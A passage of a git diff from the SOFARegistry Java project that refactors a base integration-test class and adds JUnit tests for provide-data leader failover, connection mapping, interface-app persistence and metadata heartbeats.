+31,317 @@ import com.alipay.sofa.registry.client.task.AbstractWorkerThread; import com.alipay.sofa.registry.client.task.WorkerThread; import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.Lease; import com.alipay.sofa.registry.common.model.sessionserver.CancelAddressRequest; -import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.jersey.JerseyClient; -import com.alipay.sofa.registry.server.data.cache.DatumCache; import com.alipay.sofa.registry.server.test.TestRegistryMain; -import org.junit.Before; -import org.springframework.beans.factory.annotation.Value; -import org.springframework.boot.SpringBootConfiguration; -import org.springframework.boot.test.context.SpringBootTest; -import org.springframework.context.ConfigurableApplicationContext; - -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.MediaType; -import java.io.ByteArrayInputStream; -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.ObjectInputStream; -import java.io.ObjectOutputStream; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import java.io.*; import java.lang.reflect.Field; import java.util.ArrayList; -import java.util.Arrays; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.atomic.AtomicBoolean; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertTrue; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.MediaType; +import org.h2.tools.Server; +import org.junit.Before; +import org.junit.BeforeClass; +import org.springframework.beans.factory.annotation.Value; +import org.springframework.boot.SpringBootConfiguration; +import org.springframework.boot.logging.LoggingSystem; +import org.springframework.boot.test.context.SpringBootTest; +import org.springframework.context.ConfigurableApplicationContext; -/** - * @author xuanbei 18/12/1 - */ +/** @author xuanbei 18/12/1 */ @SpringBootConfiguration @SpringBootTest -public class BaseIntegrationTest { - private static final AtomicBoolean STARTED = new AtomicBoolean( - false); +public class BaseIntegrationTest extends AbstractTest { + protected static final Logger LOGGER = LoggerFactory.getLogger(BaseIntegrationTest.class); + private static final AtomicBoolean STARTED = new AtomicBoolean(false); - public static final String LOCAL_ADDRESS = NetUtil - .getLocalAddress() - .getHostAddress(); - public static final String LOCAL_DATACENTER = "DefaultDataCenter"; - public static final String LOCAL_REGION = "DEFAULT_ZONE"; - private static final int CLIENT_OFF_MAX_WAIT_TIME = 30; - protected static ConfigurableApplicationContext metaApplicationContext; - protected static ConfigurableApplicationContext sessionApplicationContext; - protected static ConfigurableApplicationContext dataApplicationContext; + public static final String LOCAL_ADDRESS = NetUtil.getLocalAddress().getHostAddress(); + public static final String LOCAL_DATACENTER = "DefaultDataCenter"; + public static final String LOCAL_REGION = "DEFAULT_ZONE"; + private static final int CLIENT_OFF_MAX_WAIT_TIME = 30; + protected static volatile ConfigurableApplicationContext metaApplicationContext; + protected static volatile ConfigurableApplicationContext sessionApplicationContext; + protected static volatile ConfigurableApplicationContext dataApplicationContext; - protected static DefaultRegistryClient registryClient1; + protected static volatile DefaultRegistryClient registryClient1; - protected static DefaultRegistryClient registryClient2; + protected static volatile DefaultRegistryClient registryClient2; - protected static Channel sessionChannel; + protected static volatile Channel sessionChannel; - protected static Channel dataChannel; + protected static volatile Channel dataChannel; - protected static Channel metaChannel; + protected static volatile Channel metaChannel; - protected static volatile String dataId; - protected static volatile String value; - protected static volatile UserData userData; + protected static int sessionPort = 9603; + protected static int metaPort = 9615; + protected static int dataPort = 9622; - protected static int sessionPort = 9603; - protected static int metaPort = 9615; - protected static int dataPort = 9622; + @Value("${session.server.serverPort}") + protected int sessionServerPort; - @Value("${meta.server.raftServerPort}") - protected int raftPort; + @Value("${data.server.syncDataPort}") + protected int syncDataPort; - @Value("${session.server.serverPort}") - protected int sessionServerPort; + protected Server h2Server = new Server(); - @Value("${data.server.syncDataPort}") - protected int syncDataPort; - - @Before - public void before() throws Exception { - startServerIfNecessary(); + private Channel checkChannel(Channel channel) { + if (channel == null) { + String msg = + StringFormatter.format( + "channel is null, {}, {}", + this.getClass().getSimpleName(), + System.identityHashCode(this)); + throw new NullPointerException(msg); } + return channel; + } - public static void startServerIfNecessary() throws Exception { - if (STARTED.compareAndSet(false, true)) { - Map configs = new HashMap<>(); - configs.put("nodes.metaNode", LOCAL_DATACENTER + ":" + LOCAL_ADDRESS); - configs.put("nodes.localDataCenter", LOCAL_DATACENTER); - configs.put("nodes.localRegion", LOCAL_REGION); - - TestRegistryMain testRegistryMain = new TestRegistryMain(); - testRegistryMain.startRegistryWithConfig(configs); - metaApplicationContext = testRegistryMain.getMetaApplicationContext(); - sessionApplicationContext = testRegistryMain.getSessionApplicationContext(); - dataApplicationContext = testRegistryMain.getDataApplicationContext(); - initRegistryClientAndChannel(); - } + protected Channel getMetaChannel() { + return checkChannel(metaChannel); + } + + @BeforeClass + public static void beforeBaseIntegrationClass() throws Exception { + // make sure ctx is exist + Class.forName(AbstractLogContext.class.getName()); + System.setProperty( + LoggingSystem.SYSTEM_PROPERTY, + "org.springframework.boot.logging.log4j2.Log4J2LoggingSystem"); + System.setProperty("spring.profiles.active", "integrate"); + System.setProperty(Lease.LEASE_DURATION, "2"); + System.setProperty(SlotConfig.KEY_DATA_SLOT_NUM, "16"); + beforeInit(); + } + + @Before + public void beforeBaseIntegration() throws Exception { + // h2Server.start(); + // Class.forName("org.h2.driver"); + LOGGER.info( + "beforeBaseIntegrationCalled, {}, {}", + this.getClass().getSimpleName(), + System.identityHashCode(this)); + beforeInit(); + } + + protected static void beforeInit() throws Exception { + startServerIfNecessary(); + initRegistryClientAndChannel(); + } + + public static void startServerIfNecessary() throws Exception { + if (STARTED.compareAndSet(false, true)) { + Map configs = new HashMap<>(); + configs.put("nodes.metaNode", LOCAL_DATACENTER + ":" + LOCAL_ADDRESS); + configs.put("nodes.localDataCenter", LOCAL_DATACENTER); + configs.put("nodes.localRegion", LOCAL_REGION); + + TestRegistryMain testRegistryMain = new TestRegistryMain(); + testRegistryMain.startRegistryWithConfig(configs); + metaApplicationContext = testRegistryMain.getMetaApplicationContext(); + sessionApplicationContext = testRegistryMain.getSessionApplicationContext(); + dataApplicationContext = testRegistryMain.getDataApplicationContext(); + initRegistryClientAndChannel(); + LOGGER.info( + "startServerNecessary, {} loaded by {}", + BaseIntegrationTest.class, + BaseIntegrationTest.class.getClassLoader(), + new Exception("for trace")); + Thread.sleep(1000 * 20); } + } - private static void initRegistryClientAndChannel() { - if (registryClient1 == null) { - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setAppName("testApp1").setDataCenter(LOCAL_DATACENTER).setZone(LOCAL_REGION) - .setRegistryEndpoint(LOCAL_ADDRESS).setRegistryEndpointPort(sessionPort).build(); - registryClient1 = new DefaultRegistryClient(config); - registryClient1.init(); - } + protected static void initRegistryClientAndChannel() throws Exception { + if (registryClient1 == null) { + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start() + .setSyncConfigRetryInterval(60000) + .setAppName("testApp1") + .setDataCenter(LOCAL_DATACENTER) + .setZone(LOCAL_REGION) + .setRegistryEndpoint(LOCAL_ADDRESS) + .setRegistryEndpointPort(sessionPort) + .build(); + registryClient1 = new DefaultRegistryClient(config); + registryClient1.init(); + } - if (registryClient2 == null) { - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setAppName("testApp2").setDataCenter(LOCAL_DATACENTER) - .setRegistryEndpoint(LOCAL_ADDRESS).setZone(LOCAL_REGION) - .setRegistryEndpointPort(sessionPort).build(); - registryClient2 = new DefaultRegistryClient(config); - registryClient2.init(); - } + if (registryClient2 == null) { + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start() + .setAppName("testApp2") + .setDataCenter(LOCAL_DATACENTER) + .setRegistryEndpoint(LOCAL_ADDRESS) + .setZone(LOCAL_REGION) + .setRegistryEndpointPort(sessionPort) + .build(); + registryClient2 = new DefaultRegistryClient(config); + registryClient2.init(); + } - if (sessionChannel == null || dataChannel == null || metaChannel == null) { - sessionChannel = JerseyClient.getInstance() - .connect(new URL(LOCAL_ADDRESS, sessionPort)); - dataChannel = JerseyClient.getInstance().connect(new URL(LOCAL_ADDRESS, dataPort)); - metaChannel = JerseyClient.getInstance().connect(new URL(LOCAL_ADDRESS, metaPort)); - } + if (sessionChannel == null) { + sessionChannel = JerseyClient.getInstance().connect(new URL(LOCAL_ADDRESS, sessionPort)); + LOGGER.info( + "init Channel for session: {}, {}, {}", + sessionChannel, + dataChannel, + metaChannel, + new Exception("for trace")); + } + if (dataChannel == null) { + dataChannel = JerseyClient.getInstance().connect(new URL(LOCAL_ADDRESS, dataPort)); + LOGGER.info( + "init Channel for data: {}, {}, {}", + sessionChannel, + dataChannel, + metaChannel, + new Exception("for trace")); + } + if (metaChannel == null) { + metaChannel = JerseyClient.getInstance().connect(new URL(LOCAL_ADDRESS, metaPort)); + LOGGER.info( + "init Channel for meta: {}, {}, {}", + sessionChannel, + dataChannel, + metaChannel, + new Exception("for trace")); } + ParaCheckUtil.checkNotNull(sessionChannel.getWebTarget(), "sessionChannel"); + ParaCheckUtil.checkNotNull(dataChannel.getWebTarget(), "dataChannel"); + ParaCheckUtil.checkNotNull(metaChannel.getWebTarget(), "metaChannel"); + } - public static class MySubscriberDataObserver implements SubscriberDataObserver { - @Override - public void handleData(String dataId, UserData data) { - BaseIntegrationTest.dataId = dataId; - BaseIntegrationTest.userData = data; - } + public static class MySubscriberDataObserver implements SubscriberDataObserver { + public volatile String dataId; + public volatile UserData userData; + + @Override + public void handleData(String dataId, UserData data) { + this.dataId = dataId; + this.userData = data; + LOGGER.info("handleData: {}, {}", dataId, data); } + } - protected static void clientOff() throws Exception { - startServerIfNecessary(); - List connectIds = new ArrayList<>(); - connectIds.add(LOCAL_ADDRESS + ":" + getSourcePort(registryClient1)); - connectIds.add(LOCAL_ADDRESS + ":" + getSourcePort(registryClient2)); - CommonResponse response = sessionChannel + protected static void clientOff() throws Exception { + startServerIfNecessary(); + List connectIds = new ArrayList<>(); + connectIds.add( + ConnectId.parse( + LOCAL_ADDRESS + + ":" + + getSourcePort(registryClient1) + + ValueConstants.CONNECT_ID_SPLIT + + LOCAL_ADDRESS + + ":9600")); + connectIds.add( + ConnectId.parse( + LOCAL_ADDRESS + + ":" + + getSourcePort(registryClient2) + + ValueConstants.CONNECT_ID_SPLIT + + LOCAL_ADDRESS + + ":9600")); + CommonResponse response = + sessionChannel .getWebTarget() .path("api/clients/off") .request() - .post(Entity.entity(new CancelAddressRequest(connectIds), MediaType.APPLICATION_JSON), + .post( + Entity.entity(new CancelAddressRequest(connectIds), MediaType.APPLICATION_JSON), CommonResponse.class); - assertTrue(response.isSuccess()); - int times = 0; - while (times++ < CLIENT_OFF_MAX_WAIT_TIME) { - if (clientOffSuccess()) { - return; - } - Thread.sleep(500); - } - throw new RuntimeException("clientOff failed."); - } - - protected static void clearData() throws Exception { - DatumCache.getAll().clear(); - List connectIds = new ArrayList<>(Arrays.asList( - NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)), - NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient2)))); - for (String connectId : connectIds) { - Map publisherMap = DatumCache.getByHost(connectId); - if (publisherMap != null) { - publisherMap.clear(); - } - } + LOGGER.info("client of {}", connectIds); + assertTrue(response.isSuccess()); + int times = 0; + while (times++ < CLIENT_OFF_MAX_WAIT_TIME) { + if (clientOffSuccess()) { + return; + } + Thread.sleep(500); } + throw new RuntimeException("clientOff failed."); + } - private static boolean clientOffSuccess() { - String sessionDigestCount = sessionChannel.getWebTarget().path("digest/data/count") - .request(APPLICATION_JSON).get(String.class); - String dataDigestCount = dataChannel.getWebTarget().path("digest/datum/count") - .request(APPLICATION_JSON).get(String.class); - return sessionDigestCount - .equals("Subscriber count: 0, Publisher count: 0, Watcher count: 0") - && (dataDigestCount.equals("CacheDigest datum cache is empty") || dataDigestCount - .contains("[Publisher] size of publisher in DefaultDataCenter is 0")); - } + private static boolean clientOffSuccess() { + String sessionDigestCount = + sessionChannel + .getWebTarget() + .path("digest/data/count") + .request(APPLICATION_JSON) + .get(String.class); + String dataDigestCount = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + return sessionDigestCount.equals("Subscriber count: 0, Publisher count: 0, Watcher count: 0") + && (dataDigestCount.equals("CacheDigest datum cache is empty") + || dataDigestCount.contains("[Publisher] size of publisher in DefaultDataCenter is 0")); + } - protected static int getSourcePort(DefaultRegistryClient registryClient) throws Exception { - Field workerThreadField = DefaultRegistryClient.class.getDeclaredField("workerThread"); - workerThreadField.setAccessible(true); - WorkerThread workerThread = (WorkerThread) workerThreadField.get(registryClient); + protected static int getSourcePort(DefaultRegistryClient registryClient) throws Exception { + Field workerThreadField = DefaultRegistryClient.class.getDeclaredField("workerThread"); + workerThreadField.setAccessible(true); + WorkerThread workerThread = (WorkerThread) workerThreadField.get(registryClient); - Field clientField = AbstractWorkerThread.class.getDeclaredField("client"); - clientField.setAccessible(true); - Client client = (Client) clientField.get(workerThread); - client.ensureConnected(); + Field clientField = AbstractWorkerThread.class.getDeclaredField("client"); + clientField.setAccessible(true); + Client client = (Client) clientField.get(workerThread); + client.ensureConnected(); - Field clientConnectionField = ClientConnection.class.getDeclaredField("clientConnection"); - clientConnectionField.setAccessible(true); - Connection clientConnection = (Connection) clientConnectionField.get(client); - return clientConnection.getLocalPort(); - } + Field clientConnectionField = ClientConnection.class.getDeclaredField("clientConnection"); + clientConnectionField.setAccessible(true); + Connection clientConnection = (Connection) clientConnectionField.get(client); + return clientConnection.getLocalPort(); + } - protected Object bytes2Object(byte[] bytes) throws IOException, ClassNotFoundException { - Object object = null; - if (bytes != null) { - ByteArrayInputStream bis = new ByteArrayInputStream(bytes); - ObjectInputStream input = null; - try { - input = new ObjectInputStream(bis); - object = input.readObject(); - } finally { - if (input != null) { - input.close(); - } - } + protected Object bytes2Object(byte[] bytes) throws IOException, ClassNotFoundException { + Object object = null; + if (bytes != null) { + ByteArrayInputStream bis = new ByteArrayInputStream(bytes); + ObjectInputStream input = null; + try { + input = new ObjectInputStream(bis); + object = input.readObject(); + } finally { + if (input != null) { + input.close(); } - return object; + } } + return object; + } - protected byte[] object2bytes(Object object) throws IOException { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - ObjectOutputStream javaos = null; - try { - javaos = new ObjectOutputStream(bos); - javaos.writeObject(object); - } finally { - try { - javaos.close(); - } catch (IOException ioe) { - //do nothing - } - } - return bos.toByteArray(); + protected byte[] object2bytes(Object object) throws IOException { + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + ObjectOutputStream javaos = null; + try { + javaos = new ObjectOutputStream(bos); + javaos.writeObject(object); + } finally { + try { + javaos.close(); + } catch (IOException ioe) { + // do nothing + } } -} \ No newline at end of file + return bos.toByteArray(); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/elector/ProvideDataTest.java b/test/src/test/java/com/alipay/sofa/registry/test/elector/ProvideDataTest.java new file mode 100644 index 000000000..6479c6d24 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/elector/ProvideDataTest.java @@ -0,0 +1,86 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.elector; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.mockito.MockitoAnnotations; +import org.springframework.beans.BeanUtils; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataTest.java, v 0.1 2021年03月15日 15:32 xiaojian.xj Exp $ + */ +@RunWith(SpringRunner.class) +public class ProvideDataTest extends BaseIntegrationTest { + + private ProvideDataRepository provideDataRepository; + + private ProvideDataService provideDataService; + + @Before + public void beforeProvideDataTest() { + MockitoAnnotations.initMocks(this); + + provideDataRepository = + metaApplicationContext.getBean("provideDataJdbcRepository", ProvideDataRepository.class); + + provideDataService = + metaApplicationContext.getBean("provideDataService", ProvideDataService.class); + } + + @Test + public void testProvideData() throws InterruptedException { + + String key = "keyA" + System.currentTimeMillis(); + String value = "valueA" + System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId(key, "DEFAULT", "DEFAULT"); + PersistenceData data = PersistenceDataBuilder.createPersistenceData(dataInfoId, value); + boolean save = provideDataService.saveProvideData(data); + Assert.assertTrue(save); + Assert.assertEquals( + value, provideDataService.queryProvideData(dataInfoId).getEntity().getData()); + + PersistenceData newData = new PersistenceData(); + BeanUtils.copyProperties(data, newData); + provideDataService.loseLeader(); + long exceptVersion = newData.getVersion(); + newData.setData("new valueA"); + newData.setVersion(System.currentTimeMillis()); + boolean put = provideDataRepository.put(newData, exceptVersion); + Assert.assertTrue(put); + + Thread.sleep(5000); + Assert.assertEquals( + value, provideDataService.queryProvideData(dataInfoId).getEntity().getData()); + + provideDataService.becomeLeader(); + Thread.sleep(5000); + Assert.assertEquals( + newData.getData(), provideDataService.queryProvideData(dataInfoId).getEntity().getData()); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/mapper/ConnectionMapperTest.java b/test/src/test/java/com/alipay/sofa/registry/test/mapper/ConnectionMapperTest.java new file mode 100644 index 000000000..900fe5bb7 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/mapper/ConnectionMapperTest.java @@ -0,0 +1,43 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.mapper; + +import com.alipay.sofa.registry.server.session.mapper.ConnectionMapper; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author ruoshan + * @since 5.4.1 + */ +public class ConnectionMapperTest { + + @Test + public void simpleTestForMap() { + String connectId = "1.1.1.1:1234"; + String clientIp = "2.2.2.2"; + ConnectionMapper connectionMapper = new ConnectionMapper(); + // add + + connectionMapper.add(connectId, clientIp); + Assert.assertTrue(connectionMapper.contains(connectId)); + Assert.assertEquals(clientIp, connectionMapper.get(connectId)); + // remove + connectionMapper.remove(connectId); + Assert.assertFalse(connectionMapper.contains(connectId)); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/metadata/InterfaceAppsJdbcRepositoryTest.java b/test/src/test/java/com/alipay/sofa/registry/test/metadata/InterfaceAppsJdbcRepositoryTest.java new file mode 100644 index 000000000..df2e0109f --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/metadata/InterfaceAppsJdbcRepositoryTest.java @@ -0,0 +1,80 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.metadata; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionCacheRegistry; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.ArrayList; +import java.util.HashSet; +import java.util.List; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsJdbcRepositoryTest.java, v 0.1 2021年04月12日 10:31 xiaojian.xj Exp $ + */ +public class InterfaceAppsJdbcRepositoryTest extends BaseIntegrationTest { + private InterfaceAppsRepository interfaceAppsJdbcRepository; + + private AppRevisionCacheRegistry appRevisionCacheRegistry; + + @Before + public void buildAppRevision() { + interfaceAppsJdbcRepository = + sessionApplicationContext.getBean( + "interfaceAppsJdbcRepository", InterfaceAppsRepository.class); + + appRevisionCacheRegistry = + sessionApplicationContext.getBean( + "appRevisionCacheRegistry", AppRevisionCacheRegistry.class); + } + + @Test + public void batchSaveTest() throws InterruptedException { + + String app = "batchSaveApp"; + List services = new ArrayList<>(); + for (int i = 0; i < 100; i++) { + services.add(i + "batchSaveService-" + System.currentTimeMillis()); + } + + HashSet sets = new HashSet<>(services.subList(0, 1)); + interfaceAppsJdbcRepository.batchSave(app, sets); + for (String service : services) { + InterfaceMapping appNames = appRevisionCacheRegistry.getAppNames(service); + if (sets.contains(service)) { + Assert.assertEquals(1, appNames.getApps().size()); + Assert.assertTrue(appNames.getApps().contains(app)); + } else { + Assert.assertTrue(appNames.getNanosVersion() == -1); + } + } + + interfaceAppsJdbcRepository.batchSave(app, new HashSet<>(services)); + Thread.sleep(6000); + for (String service : services) { + InterfaceMapping appNames = appRevisionCacheRegistry.getAppNames(service); + + Assert.assertEquals(1, appNames.getApps().size()); + Assert.assertTrue(appNames.getApps().contains(app)); + } + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataHeartbeatTest.java b/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataHeartbeatTest.java new file mode 100644 index 000000000..934a8a23e --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataHeartbeatTest.java @@ -0,0 +1,87 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.metadata; + +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import java.util.Collections; +import java.util.concurrent.ExecutionException; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author xiaojian.xj + * @version $Id: MetadataHeartbeatTest.java, v 0.1 2021年04月02日 16:14 xiaojian.xj Exp $ + */ +public class MetadataHeartbeatTest extends MetadataTest { + + public class HeartbeatRunner extends LoopRunnable { + + @Override + public void runUnthrowable() { + for (AppRevision appRevision : appRevisionList) { + MetaHeartbeatResponse response = + appRevisionHandlerStrategy.heartbeat( + Collections.singletonList(appRevision.getRevision())); + if (response.getStatusCode() == ValueConstants.METADATA_STATUS_DATA_NOT_FOUND) { + RegisterResponse result = new RegisterResponse(); + appRevisionHandlerStrategy.handleAppRevisionRegister(appRevision, result); + } + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.SECONDS); + } + } + + @Test + public void heartbeatClean() throws ExecutionException, InterruptedException { + + super.register(); + + for (AppRevision appRevision : appRevisionList) { + + boolean success = appRevisionHeartbeatRegistry.heartbeat(appRevision.getRevision()); + Assert.assertTrue(success); + appRevisionMapper.deleteAppRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + } + appRevisionHeartbeatRegistry.doHeartbeatCacheChecker(); + + for (AppRevision appRevision : appRevisionList) { + boolean success = appRevisionHeartbeatRegistry.heartbeat(appRevision.getRevision()); + Assert.assertFalse(success); + } + + ConcurrentUtils.createDaemonThread("heartbeat-runner-test", new HeartbeatRunner()).start(); + Thread.sleep(3000); + for (AppRevision appRevision : appRevisionList) { + + boolean success = appRevisionHeartbeatRegistry.heartbeat(appRevision.getRevision()); + Assert.assertTrue(success); + appRevisionMapper.deleteAppRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + } + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataTest.java b/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataTest.java new file mode 100644 index 000000000..33f54bdec --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/metadata/MetadataTest.java @@ -0,0 +1,334 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.metadata; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionCacheRegistry; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionHeartbeatRegistry; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import com.google.common.collect.Maps; +import java.util.ArrayList; +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.Callable; +import java.util.concurrent.ExecutionException; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.Executors; +import java.util.concurrent.Future; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author xiaojian.xj + * @version $Id: MetadataTest.java, v 0.1 2021年02月03日 19:50 xiaojian.xj Exp $ + */ +@RunWith(SpringRunner.class) +public class MetadataTest extends BaseIntegrationTest { + + protected AppRevisionHandlerStrategy appRevisionHandlerStrategy; + + protected AppRevisionCacheRegistry appRevisionCacheRegistry; + + protected AppRevisionHeartbeatRegistry appRevisionHeartbeatRegistry; + + protected List appRevisionList; + + protected AppRevisionMapper appRevisionMapper; + + protected DefaultCommonConfig defaultCommonConfig; + + @Before + public void buildAppRevision() { + appRevisionHandlerStrategy = + sessionApplicationContext.getBean( + "appRevisionHandlerStrategy", AppRevisionHandlerStrategy.class); + appRevisionCacheRegistry = + sessionApplicationContext.getBean( + "appRevisionCacheRegistry", AppRevisionCacheRegistry.class); + appRevisionHeartbeatRegistry = + sessionApplicationContext.getBean( + "appRevisionHeartbeatRegistry", AppRevisionHeartbeatRegistry.class); + appRevisionMapper = + sessionApplicationContext.getBean("appRevisionMapper", AppRevisionMapper.class); + defaultCommonConfig = + sessionApplicationContext.getBean("defaultCommonConfig", DefaultCommonConfig.class); + + appRevisionList = new ArrayList<>(); + for (int i = 1; i <= 1; i++) { + long l = System.currentTimeMillis(); + String suffix = l + "-" + i; + + String appname = "foo" + suffix; + String revision = "1111" + suffix; + + AppRevision appRevision = new AppRevision(); + appRevision.setAppName(appname); + appRevision.setRevision(revision); + appRevision.setClientVersion("1.0"); + + Map> baseParams = Maps.newHashMap(); + baseParams.put( + "metaBaseParam1", + new ArrayList() { + { + add("metaBaseValue1"); + } + }); + appRevision.setBaseParams(baseParams); + + Map interfaceMap = Maps.newHashMap(); + String dataInfo1 = + DataInfo.toDataInfoId( + "func1" + suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + String dataInfo2 = + DataInfo.toDataInfoId( + "func2" 